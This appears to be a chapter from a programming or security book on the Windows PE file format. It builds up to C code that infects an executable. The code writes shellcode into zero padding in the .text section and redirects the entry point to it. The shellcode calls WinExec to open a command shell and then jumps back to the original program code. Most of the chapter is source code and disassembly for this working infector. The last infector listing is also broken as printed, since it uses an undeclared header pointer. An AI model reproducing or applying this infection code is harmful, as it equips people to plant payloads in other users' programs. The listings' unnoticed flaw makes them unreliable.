Windows PE File Format

 

Computer viruses first flourished by exploiting loopholes in DOS. Many of the early ones stayed resident in memory using the TSR (Terminate and Stay Resident) technique and were mostly coded in assembler or in the C programming language. Some of these viruses lived in the boot record or in the partition table, while others infected COM files. Then came a new genre of file viruses, which were mostly seen in (.exe) executable files.

 

However, the range is now far larger. An executable file need not always end with the extension exe; it can very well be a pif (program information file) file too. Besides, viruses are commonly seen in the form of Word macros in doc files. Whatever the file type, injecting a virus into a file requires being well-conversant with its internal structure.

 

This chapter explains how an executable file can be infected, thus calling for a complete cross-section of an exe file.

 

Prior to the Windows operating system, there was only DOS, which had its own executable file format. The designers of Windows created their own executable file format called the PE or Portable Executable file format, which was totally different from that of DOS. The Windows operating system had the capability of understanding the DOS exe file format, but the reverse would need a miracle. Thus if the average Joe executes a DOS exe file under Windows, the Windows operating system handles it, but if the reverse happened, i.e. a Windows exe file was run under DOS, then DOS would get all lost, refuse to recognize the file as an exe file and emit a cryptic error such as 'Bad command or file name'.

 

This would indeed lead to great confusion for the average user. Thus to straighten things out, all Windows executables start with a valid DOS header followed by a small DOS program. As a result, if a Windows executable is given to DOS, that small program runs and displays a polite message such as 'This program cannot be run in DOS mode.'

 

The programs given below display the internal structure of a windows file but in a 'one step at a time' approach.

 

a.cpp

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *mappedfile;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

mappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

printf("hfile=%p hfile1=%p mappedfile=%p\n",hfile,hfile1,mappedfile);

}

 

>copy c:\winnt\system32\calc.exe test.exe

 

Output

hfile=00000030 hfile1=0000002C mappedfile=00310000

 

As our code follows the rules of C++, the header files windows.h and stdio.h are required to bring in the prototypes. Header files are also significant when macros and structure tags are used in the program.

 

In order to inject code into an exe file, i.e. test.exe, the file needs to be opened. Therefore, the CreateFile function is used with the filename as one of its parameters. The file test.exe is a copy of the calculator program calc.exe.

 

This function takes seven parameters, of which only three matter to us. The first is the name of the file, the second is the mode the file is to be opened in, in our case read and write, and the fifth, OPEN_EXISTING, specifies that the file must already exist on disk and is to be opened rather than created. The function CreateFile opens the file for reading and writing as per our program and returns a HANDLE to this file.

 

The return type HANDLE, which is basically a typedef for void *, is the technique Windows uses to convey that the value in hfile is opaque. The variable cannot be used in any way other than as a function parameter, so displaying its value serves no real purpose. The one value worth testing for is INVALID_HANDLE_VALUE, which CreateFile returns on failure.

 

One way to load test.exe into memory is to read it into an array using the file reading functions. That is not a difficult job, but any changes made to the array are in memory and not on disk, hence the 'saving to disk' task has to be done manually. Instead, with the help of two functions, CreateFileMapping and MapViewOfFile, the file is mapped into memory so that changes made in memory are written back to the file by the system.

 

The first function, CreateFileMapping, takes the file handle and, as its third parameter, the protection for the mapping; PAGE_READWRITE gives write permission. The MapViewOfFile function specifies the access rights for the view, and the value returned by it is a void *, hence the cast. Casting is a necessary evil while coding in C++.

 

The value of mappedfile, shown as 310000, is the address where the contents of the file test.exe are loaded, and our next program simply verifies this claim.

 

a.c

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

printf("%c%c\n",*pmappedfile,*(pmappedfile+1));

*pmappedfile = 65;

}

 

Output

MZ

 

This program displays the first two bytes of an exe file under Windows. These happen to be the ASCII values of M and Z. Every exe file under DOS begins with the signature MZ. Again, as every executable under Windows also starts out as a DOS file, the same signature is visible there too and the output simply proves this point. Next, the first byte is changed from M to A, or 65.

 

When the program quits, the system changes the first byte of test.exe on the disk as well. Now try executing test.exe at the command prompt. You will see an error stating that the file is not a valid Windows executable.

 

Undo the above damage by changing the last line in the program to

*pmappedfile ='M';

 

and run the program. The file test.exe now executes as before.

 

a.c

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

printf("e_lfanew=%d\n",pimagedosheader->e_lfanew);

}

 

Output

e_lfanew=200

 

We would like to repeat that every executable file under Windows starts with a DOS program and the first two bytes have to be MZ. Once the DOS program ends, the Windows header begins. Microsoft did not hard code the size of this DOS program; instead the DOS file header carries a field, e_lfanew, which stores the offset from the start of the file at which the Windows header begins. This value in our case is 200.

 

a.c

#include <windows.h>

#include <stdio.h>

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

void main()

{

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

printf("%c%c %d %d\n",*dummy,*(dummy+1),*(dummy+2),*(dummy+3));

IMAGE_FILE_HEADER * pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

printf("Machine=%x\n",pimagefileheader->Machine);

printf("NumberOfSections=%d\n",pimagefileheader->NumberOfSections);

printf("TimeDateStamp=%d\n",pimagefileheader->TimeDateStamp);

printf("PointerToSymbolTable=%d\n",pimagefileheader->PointerToSymbolTable);

printf("NumberOfSymbols=%d\n",pimagefileheader->NumberOfSymbols);

printf("SizeOfOptionalHeader=%d\n",pimagefileheader->SizeOfOptionalHeader);

printf("Characteristics=%x\n",pimagefileheader->Characteristics);

}

 

Output

PE 0 0

Machine=14c

NumberOfSections=3

TimeDateStamp=938257211

PointerToSymbolTable=0

NumberOfSymbols=0

SizeOfOptionalHeader=224

Characteristics=30f

 

In this program, a variable called dummy is created that points to the location where the file test.exe is loaded in memory plus the value stored in e_lfanew, which is 200. The first four bytes at this position are the signature of the file. The output shows the signature of a PE file: the letters P and E followed by two zero bytes. The Windows header of every valid executable must start with this signature.

 

After this magic number starts a header or structure called Image File Header which is defined in the header file winnt.h. The variable pimagefileheader is created to hold the start of this structure and then all the members of the structure are displayed. The first member is called Machine with a value of 0x14c.

 

This means that the machine the program is compiled for is an Intel 386 or a later compatible processor such as a 486 or a 586. Each family of microprocessors has its own unique value. For example, a DEC Alpha would have a value of 0x184 and the MIPS R4000 0x166. At present, these machines are mostly seen in museums.

 

An exe file has different fragments like code, data, resources etc. These different entities cannot be mixed up and placed together. They require their own space for various reasons, e.g. code is executable whereas data is not. Thus different entities are placed in different compartments or sections. The second member of the structure gives a count of the sections in the file. A little later in this chapter, we will display the details of every section. For now, we have three sections.

 

The next field is the time at which the linker created this file, stored as the number of seconds since midnight UTC on the 1st of January 1970 (which is 4 PM on the 31st of December 1969 in US Pacific time). The documentation does not give any details on whether the time shown is when the linker started creating the file or when it finished.

 

The same file header is also used in obj files created by the compiler, and the next two fields deal with symbols, which is what the compiler understands. Just to clarify, every function is a symbol to the compiler.

 

The second last field holds the size of the next structure called the Image Optional Header which is 224. This header follows the Image File Header.  The next example displays the members of this gigantic structure.

 

The last field gives some more information about the exe file in a series of bits. If the first bit (0x0001) is on, then the relocations have been stripped from the file. Similarly, the second bit (0x0002) says that the file is an executable image rather than an obj file, and so on.

 

a.c

#include <windows.h>

#include <stdio.h>

void main()

{

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

printf("Magic=%x\n",pimageoptionalheader->Magic);

printf("MajorLinkerVersion=%d\n",pimageoptionalheader->MajorLinkerVersion);

printf("MinorLinkerVersion=%d\n",pimageoptionalheader->MinorLinkerVersion);

printf("SizeOfCode=%ld\n",pimageoptionalheader->SizeOfCode);

printf("SizeOfInitializedData=%ld\n",pimageoptionalheader->SizeOfInitializedData);

printf("SizeOfUninitializedData=%ld\n",pimageoptionalheader->SizeOfUninitializedData);

printf("AddressOfEntryPoint=%x\n",pimageoptionalheader->AddressOfEntryPoint);

printf("BaseOfCode=%x\n",pimageoptionalheader->BaseOfCode);

printf("BaseOfData=%x\n",pimageoptionalheader->BaseOfData);

printf("ImageBase=%x\n",pimageoptionalheader->ImageBase);

printf("SectionAlignment=%x\n",pimageoptionalheader->SectionAlignment);

printf("FileAlignment=%x\n",pimageoptionalheader->FileAlignment);

printf("MajorOperatingSystemVersion=%d\n",pimageoptionalheader->MajorOperatingSystemVersion);

printf("MinorOperatingSystemVersion=%d\n",pimageoptionalheader->MinorOperatingSystemVersion);

printf("MajorImageVersion=%d\n",pimageoptionalheader->MajorImageVersion);

printf("MinorImageVersion=%d\n",pimageoptionalheader->MinorImageVersion);

printf("MajorSubsystemVersion=%d\n",pimageoptionalheader->MajorSubsystemVersion);

printf("MinorSubsystemVersion=%d\n",pimageoptionalheader->MinorSubsystemVersion);

printf("Win32VersionValue=%d\n",pimageoptionalheader->Win32VersionValue);

printf("SizeOfImage=%d\n",pimageoptionalheader->SizeOfImage);

printf("SizeOfHeaders=%d\n",pimageoptionalheader->SizeOfHeaders);

printf("CheckSum=%d\n",pimageoptionalheader->CheckSum);

printf("Subsystem=%d\n",pimageoptionalheader->Subsystem);

printf("DllCharacteristics=%x\n",pimageoptionalheader->DllCharacteristics);

printf("SizeOfStackReserve=%x\n",pimageoptionalheader->SizeOfStackReserve);

printf("SizeOfStackCommit=%x\n",pimageoptionalheader->SizeOfStackCommit);

printf("SizeOfHeapReserve=%x\n",pimageoptionalheader->SizeOfHeapReserve);

printf("SizeOfHeapCommit=%x\n",pimageoptionalheader->SizeOfHeapCommit);

printf("LoaderFlags=%d\n",pimageoptionalheader->LoaderFlags);

printf("NumberOfRvaAndSizes=%d\n",pimageoptionalheader->NumberOfRvaAndSizes);

}

 

Output

Magic=10b

MajorLinkerVersion=5

MinorLinkerVersion=12

SizeOfCode=75264

SizeOfInitializedData=15872

SizeOfUninitializedData=0

AddressOfEntryPoint=134ef

BaseOfCode=1000

BaseOfData=14000

ImageBase=1000000

SectionAlignment=1000

FileAlignment=200

MajorOperatingSystemVersion=5

MinorOperatingSystemVersion=0

MajorImageVersion=5

MinorImageVersion=0

MajorSubsystemVersion=4

MinorSubsystemVersion=0

Win32VersionValue=0

SizeOfImage=102400

SizeOfHeaders=1536

CheckSum=113241

Subsystem=2

DllCharacteristics=8000

SizeOfStackReserve=40000

SizeOfStackCommit=1000

SizeOfHeapReserve=100000

SizeOfHeapCommit=1000

LoaderFlags=0

NumberOfRvaAndSizes=16

 

This program displays the members of the Image Optional Header which are used to write our so called virus. The header starts after the Image File Header, so the size of Image File header is added to the pointer that points to the start of the Image file header.

 

A short description of some of the fields.

 

This header starts with its own magic number, 0x10b. This is followed by the major and minor version numbers of the linker that produced the exe file, in our case 5.12. Then comes the size in bytes of the code present in the file, 75264. The size of initialized data is meant for variables that have been initialized. The size of uninitialized data is the space taken in memory when the file is loaded, though no space is reserved for it in the file on disk. The next field, the entry point, is the most crucial one. It holds an address, presently 0x134ef, which is the address of the first instruction that will be executed in memory. This field is defined to be an RVA or relative virtual address.

 

The file does not dictate where in memory the operating system must load the program, but it does state a preference in the field called ImageBase, which in our case is 0x1000000. Once the image is loaded at this position, the loader jumps to the entry point, 0x134ef bytes from this image base, to execute the first instruction. This instruction is thus stored at 0x1000000 plus 0x134ef, i.e. 0x10134ef. Thus to calculate the actual address we add the Image Base to the RVA. An RVA is always an offset from the Image Base.

 

The Base Of code holds the address of the code in memory, and this value is also given in the section table. The next field Base of Data is about the data section when loaded in memory which again is available in the section headers.

 

The section alignment refers to the start of a section in memory. In Windows, the section alignment is usually 4096 bytes, which means that every section begins in memory at a multiple of 4096. Thus if the code section is 90 bytes, the data section that follows begins 4006 bytes after the code ends, and the memory area in the middle is left unused. The file alignment is normally the sector size, i.e. 512 bytes.

 

Each section on disk begins on a new sector, so even when a section is 5 bytes large, the remaining 507 bytes are still allocated to it though unused. The rest of the fields are of academic interest to us as of now.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

section *sec;

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

sec = (struct section*)((char *)pimageoptionalheader + pimagefileheader->SizeOfOptionalHeader);

printf("Section    PointerToRawData  SizeOfRawData VirtualAddress VirtualSize\n");

for (int i=0;i<pimagefileheader->NumberOfSections;i++)

{

printf("%.8s      %05x             %05x         %05x          %05x\n",sec[i].Name , sec[i].PointerToRawData,sec[i].SizeOfRawData,sec[i].VirtualAddress,sec[i].VirtualSize);

}

}

 

Output

Section    PointerToRawData  SizeOfRawData VirtualAddress VirtualSize

.text      00600             12600         01000          124ee

.data      12c00             00c00         14000          010c0

.rsrc      13800             02c00         16000          02b98

 

This program proceeds further to display the details of the section headers that immediately follow the Image Optional header. There is one section header per section and the size of each header is 40 bytes. A structure called section is created, even though winnt.h already defines one (IMAGE_SECTION_HEADER), just to explain things better. Even though we are interested in the first five members only, we still need a structure 40 bytes long as the section headers are stored back to back. This explains the padding of 16 bytes towards the end.

 

The Image File header has a member which gives the number of sections present in the executable. Thus using a for loop details of each section can be displayed.

 

The first member of the header is always the name of the section, which generally starts with a dot and is restricted to 8 bytes. By convention the section that carries code is called .text, the one carrying data .data and the one carrying resources .rsrc. Even though the above names are conventional, using the compiler options, we can create our own sections and give them user-defined names that need not start with a dot.

 

The next member, even though it is called Virtual Size, is the actual size of the section data. Similarly, there is one more field called Size of Raw Data, which is the size of the section on disk rounded up to the file alignment, i.e. 512 bytes.

 

The field PointerToRawData is the position or offset of the section on disk. Thus its value is a multiple of the file alignment, or 512 bytes. The loader uses this value to identify where each section starts on disk.

 

The VirtualAddress field is the offset when the section is loaded in memory where all values are a multiple of 1000 hex. This is where the sections are to be found in memory.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

unsigned char vcdcode[]="\xcc";

section *psection;

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

long positionofvcd;

int howmanyzeroes=0,i;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

psection = (struct section*)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

int totalsize = psection->PointerToRawData + psection->SizeOfRawData;

for(positionofvcd=psection->PointerToRawData;positionofvcd <= totalsize;positionofvcd++)

{

if(pmappedfile[positionofvcd]==0)

{

howmanyzeroes++;

if(howmanyzeroes==69)

break;

}

else

howmanyzeroes=0;

}

positionofvcd -= 65;

printf("positionofvcd=%x\n",positionofvcd);

pimageoptionalheader->AddressOfEntryPoint = positionofvcd + psection->VirtualAddress - psection->PointerToRawData;

int sizeofvcd = sizeof(vcdcode);

for(i =0; i<sizeofvcd ;i++)

pmappedfile[positionofvcd+i]=vcdcode[i];

}

 

Output

positionofvcd=12af3

 

We have attempted to do something significant in this program. On executing the above program, the program test.exe gets infected, but in a rather unique way. When the executable test.exe is started, it displays a message box stating that a breakpoint has been reached. This implies that instead of the code of the program test.exe being called, the breakpoint instruction, opcode 0xcc, has been encountered.

 

Now to the workings.

A variable totalsize is initialized to denote an offset that points to the end of the section. This offset is achieved by adding the SizeOfRawData to the PointerToRawData field which points to the section start.

 

The next goal is to find the place in the .text section where there are 69 consecutive zeroes. This position within the .text section is required as our code or vcd (virus code) will be copied here, thus not overwriting the actual code. The text section, like all other sections, is zero or null padded on disk till it reaches the file alignment. Thus finding 69 consecutive zeroes is not too difficult.

 

In the for loop, the variable positionofvcd is set to the start of the .text section on disk. In the extreme case where we cannot find 69 consecutive zeroes, we would like the loop to terminate when it reaches the end of the section.

 

The file on disk and the bytes in the pmappedfile array are the same, so we check the bytes in memory since that is easier using the array notation. The variable pmappedfile refers to the start of the memory where the file is loaded and positionofvcd is the offset. When the value at the offset is zero, the variable howmanyzeroes is incremented by one.

 

Thus at any point in time variable howmanyzeroes gives a count on the consecutive zeroes passed over. Also, when a non zero value is encountered, the else block gets called where the variable is reset to 0 again. Simultaneously, in the if statement a check is performed whether the variable howmanyzeroes is 69. If so, the loop is terminated as 69 consecutive zeroes in the file have been found.

 

The offset variable positionofvcd, however, is at the end of the 69 consecutive zeroes. Therefore, to reposition it towards the start, 69 must be subtracted from it. We subtract 65 instead, just to keep 4 zeroes. What are 4 zeroes between us? This shows no errors and everything works as advertised.

 

The next task is to change the entry point RVA. Just to refresh your memory, the entry point points to the first byte of code that is to be executed and it is an RVA. The value for this field should now point to the start of the 65 consecutive zeroes.

 

The position of vcd is an offset from the start of the file, and therefore the start of the section, stored in the PointerToRawData member of the section structure, is subtracted from it. The psection variable points to the .text section header, so this gives an offset from the beginning of the text section. However, our objective is to get the offset from the image base, and therefore the section's VirtualAddress, also stored in the section structure, is added to convert it into an RVA. If we execute the program at this stage, the loader would load test.exe into memory and then execute our code, which simply comprises 65 consecutive zeroes.

 

So the next job is to add the code that is to be executed. For this purpose, an array of chars called vcdcode is created which currently holds only one byte, i.e. CC, the op code for a breakpoint. Later the actual code will be inserted in this array. The code bytes of this array are copied to the memory location of the consecutive zeroes. The variable positionofvcd has the offset at which these bytes need to be copied. The system, as always, will write these bytes to disk.

 

In this manner, the first of the zeroes is replaced with a breakpoint. Now, when we run our program and then run test, we see the breakpoint interrupt generated. Simply click on ok and proceed to the next program that does much more.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

unsigned char vcdcode[] = "\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";

section *psection;

HMODULE hloadlibrary;

HANDLE hfile,hfile1;

unsigned char *pmappedfile, *dummy;

long positionofvcd,haddresoffunction;

int howmanyzeroes=0,i;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

dummy = (unsigned char  *)(pmappedfile + pimagedosheader->e_lfanew);

IMAGE_FILE_HEADER *pimagefileheader = (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

psection = (struct section*)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

int totalsize = psection->PointerToRawData + psection->SizeOfRawData;

for(positionofvcd=psection->PointerToRawData;positionofvcd <= totalsize;positionofvcd++)

{

if(pmappedfile[positionofvcd]==0)

{

howmanyzeroes++;

if(howmanyzeroes==69)

break;

}

else

howmanyzeroes=0;

}

positionofvcd -= 65;

pimageoptionalheader->AddressOfEntryPoint = positionofvcd + psection->VirtualAddress - psection->PointerToRawData;

int sizeofvcd = sizeof(vcdcode);

hloadlibrary = LoadLibrary("kernel32.dll");

haddresoffunction = (unsigned long)GetProcAddress(hloadlibrary,"WinExec");

for (i = 0; i < 4 ; i++)

vcdcode[sizeofvcd-10+i] = haddresoffunction >> (i * 8);

for(i =0; i<sizeofvcd ;i++)

pmappedfile[positionofvcd+i]=vcdcode[i];

}

 

The best way to understand this program is to run it and see the code being executed in the debugger. Thus at the breakpoint interrupt click on cancel. The code shown below is displayed in the debug window and it is similar to what is written in the vcdcode array.

 

Just to sum up. The entry point RVA is changed to point to the newly inserted code and then file test.exe is executed. The breakpoint interrupt gets called. The bytes that we have in the vcdcode array are disassembled as

 

Output

CC                   int         3

55                   push        ebp

8B EC                mov         ebp,esp

51                   push        ecx

C7 45 FC 63 6D 64 00 mov         dword ptr [ebp-4],646D63h

6A 05                push        5

8B C5                mov         eax,ebp

83 E8 04             sub         eax,4

50                   push        eax

B8 AF A7 E9 77       mov         eax,77E9A7AFh

FF D0                call        eax

8B E5                mov         esp,ebp

5D                   pop         ebp

 

The explanation for the assembler code is the same, as from the previous chapter.

 

The first instruction is the breakpoint interrupt CC. Then 55 becomes push ebp. One of the many reasons a register is pushed on the stack is that its value is about to be changed and the original value is to be restored at the end of the code. A simple rule in assembler is that whenever a register is changed, like decent people, once the task is done we restore it to its original value. The next instruction replaces the contents of the ebp register with those of esp. The esp register tracks the top of the stack each time a value is pushed on or popped off it. Thus by storing a copy of esp in ebp, which will not be changed, we now have a reference to the position of the stack prior to the vcd code doing its work. Besides, there is now a fixed reference point from which to refer to values on the stack. When our vcd code finishes, it should restore the stack to its original position. Thus the vcd code should once again copy ebp back to esp to restore the stack.

 

The actual work starts now. We push ecx on the stack. By pushing its value, we have actually allocated 4 memory locations on the stack, though its value is insignificant for the moment. The stack moves down by 4 and hence the difference between esp and ebp will be 4. Thus ebp-4 will represent the value we have just pushed on the stack.

 

The string cmd is to be placed on the stack. Thus the next instruction copies the ASCII values of c, m and d, i.e. 63, 6d and 64, followed by a terminating zero, onto the stack at ebp-4, the position where we pushed the value of the ecx register. On a little endian machine the lowest byte is stored first, which is why 63h or c comes last when the four bytes are written as the single number 646D63h. The square brackets in assembler dereference a pointer.

 

If ebp had a value 100, then characters cmd would be stored at locations 96 onwards. Thus we have allocated 4 bytes on the stack and copied our string there. In assembler, we are allowed to write to memory that has been previously allocated.

 

The WinExec function takes two parameters: the name of the program to be executed and the initial mode the window should open in. The value 5 (SW_SHOW) shows the window in its current size and position. As the parameters are to be pushed in reverse order, we push 5 on the stack first. Then the address of where the string cmd starts in memory is to be pushed, which in our case is ebp-4.

To make matters easier, we first mov ebp into eax, subtract 4 from it and then push this value on the stack. Finally, the function WinExec is called. However, our problem is that we have no clue where this function starts in memory. Thus we use the function LoadLibrary to retrieve the address at which kernel32.dll, the dll that contains the code of the WinExec function, starts in memory.

 

Then, using the function GetProcAddress, we retrieve the address of this function in the dll and thus in memory. At run time this value has to end up in the eax register, which is the job of the op code B8 followed by the four bytes of the address. These four bytes begin 10 bytes from the end of the array. For this reason, we extract each byte of the address of WinExec, which here is 77e9a7af, and place it into our array vcdcode. The address of WinExec changes from one Windows version and service pack to the next, and hence it is not hard coded.

 

Once its address is in the eax register, the call eax op code is used to call the code of WinExec. As a result, the DOS command box opens.

 

Mission Accomplished.

The clean up task now requires the stack to be put back to its original state, so we move the value of ebp back into esp. The stack pointer is now exactly where it was just after the push ebp at the start, so we simply pop the original value of ebp back into the ebp register.

 

A small glitch here is that in spite of opening the dos box, the original code does not get called at all. This is rectified in the next program.

 

All that this program does is hand control back to the original code.

 

a.c

#include <windows.h>

#include <stdio.h>

struct section {

BYTE    Name[8];

DWORD   VirtualSize;

DWORD   VirtualAddress;

DWORD   SizeOfRawData;

DWORD   PointerToRawData;

char a[16];   

};

void main()

{

unsigned char vcdcode[]="\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";

section *psection;

HMODULE hloadlibrary;

HANDLE hfile,hfile1;

unsigned char *pmappedfile;

long positionofvcd,haddresoffunction;

int howmanyzeroes=0,i;

hfile = CreateFile("test.exe",GENERIC_WRITE | GENERIC_READ,0,0,OPEN_EXISTING,0,0);

hfile1 = CreateFileMapping (hfile, 0, PAGE_READWRITE, 0, 0, 0);

pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);

IMAGE_DOS_HEADER *pimagedosheader  = (IMAGE_DOS_HEADER *)pmappedfile;

IMAGE_OPTIONAL_HEADER *pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));

psection = (struct section*)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));

int totalsize = psection->PointerToRawData + psection->SizeOfRawData;

for(positionofvcd=psection->PointerToRawData;positionofvcd <= totalsize;positionofvcd++)

{

if(pmappedfile[positionofvcd]==0)

{

howmanyzeroes++;

if(howmanyzeroes==69)

break;

}

else

howmanyzeroes=0;

}

positionofvcd -= 65;

long goingback = pimageoptionalheader->AddressOfEntryPoint+pimageoptionalheader->ImageBase;

pimageoptionalheader->AddressOfEntryPoint = positionofvcd + psection->VirtualAddress - psection->PointerToRawData;

int sizeofvcd = sizeof(vcdcode);

hloadlibrary = LoadLibrary("kernel32.dll");

haddresoffunction = (unsigned long)GetProcAddress(hloadlibrary,"WinExec");

for (i = 0; i < 4 ; i++)

vcdcode[sizeofvcd-10+i] = haddresoffunction >> (i * 8);

for(i =0; i<sizeofvcd ;i++)

pmappedfile[positionofvcd+i]=vcdcode[i];

unsigned char jumpback[]="\xB8\xbb\xbb\xbb\xbb\xff\xe0";

for (i = 0; i < 4 ; i++)

jumpback[1+i] = goingback >> (i * 8);

for(i=0; i<7 ;i++)

pmappedfile[positionofvcd+sizeofvcd+i-1]=jumpback[i];

}

 

The AddressOfEntryPoint member stores the address of the code that is to be executed first. Thus before changing its value to point to our vcd code, we save the original value in a variable called goingback. The point to be noted is that this address is an RVA, therefore to reach the actual virtual address in memory we add the ImageBase value to it.

 

Next, we create an array jumpback that will carry code that jumps back to the original entry point. Once again it starts with the op code B8 that moves a value into the eax register. As before, a for loop is used to write the actual jump address into this array using the goingback variable.

 

Then these 7 bytes are added to the end of the vcd so that after the dos box gets created and it is shut down, the original code is executed. The actual bytes that get executed are as follows.

 

B8 20 24 01 01   mov         eax,1012420h

FF E0            jmp         eax

 

The difference between a call and a jmp instruction is that with jmp the address of the next instruction is not saved on the stack, as there is no need to return.

 

Thus the code will infect a file in such a way that each time the file is executed, a dos box gets created and then the original code gets called.

 

The Exports Table.

 

e.c

void __declspec(dllexport) abc()

{

}

void __declspec(dllexport) pqr()

{

}

void xyz()

{

}

void aaa()

{

}

void bbb()

{

}

void ccc()

{

}

 

e.def

LIBRARY e.dll

EXPORTS

xyz @5

aaa @7

bbb @12

 

cl -c e.c

link /dll /def:e.def e.obj

 

